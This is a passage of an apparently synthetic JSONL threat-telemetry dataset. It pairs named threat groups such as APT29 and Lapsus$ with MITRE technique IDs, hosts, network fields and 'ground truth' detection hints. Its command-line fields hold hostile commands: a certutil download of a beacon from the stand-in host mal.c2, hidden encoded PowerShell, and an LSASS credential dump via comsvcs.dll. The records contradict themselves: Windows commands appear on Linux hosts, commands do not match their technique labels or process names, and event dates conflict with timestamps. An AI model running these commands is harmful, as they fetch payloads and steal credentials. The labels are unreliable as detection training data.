JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-02-28T11:55:32.000Z","user":{"name":"svc_8rpw1nop5qt6","sid":"S-1-5-21-547863737-511043939-2719"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement","Collection"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20260923T114455000Z_0017391","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.5.108.225","name":"IAM-ROLE-PA5UZNWOAY","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17391Mustang PandaT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.27.121.119","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-09T01:11:45.000Z","user":{"name":"azuread\\rmp3zaf2yfzr","sid":"S-1-5-21-277499280-140838472-1615"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Impact","Discovery","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20250507T100933000Z_0017393","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.165.88.55","name":"AZURE-VM-BFFOECV1OB","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17393Lapsus$T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.93.145.156","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-03-06T13:57:57.000Z","user":{"name":"svc_tr2cxsxldukk","sid":"S-1-5-21-913252930-651259583-8973"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Command and Control"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20250312T114854000Z_0017395","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.49.42.71","name":"EC2-INST-2ID4SUSBVY","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17395APT29T1071.001"},"network":{"domain":"github.com","dst_ip":"1.128.71.52","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-05T08:38:03.000Z","user":{"name":"svc_1nn6mm30jvgg","sid":"S-1-5-21-852835024-515312960-9341"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1059.001 using LOLBin technique.","sub_technique":"PowerShell","tactic":["Lateral Movement","Initial Access","Reconnaissance"],"technique_id":"T1059.001"},"event_id":"evt_fin7_20251106T194108000Z_0017397","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.31.91.224","name":"IAM-ROLE-KC5UQ8H0H6","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17397FIN7T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.158.178.75","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-11T04:51:47.000Z","user":{"name":"azuread\\xd8aglnrsk8e","sid":"S-1-5-21-588636165-702719065-2600"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Collection","Lateral Movement","Exfiltration"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20260630T222232000Z_0017399","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.18.188.8","name":"AZURE-VM-QNVBWOC9LT","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"17399Lapsus$T1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.137.5.37","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 858 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-06-20T08:14:42.000Z","user":{"name":"i-1196tvscdmw0","sid":"S-1-5-21-771154264-265006217-9059"}}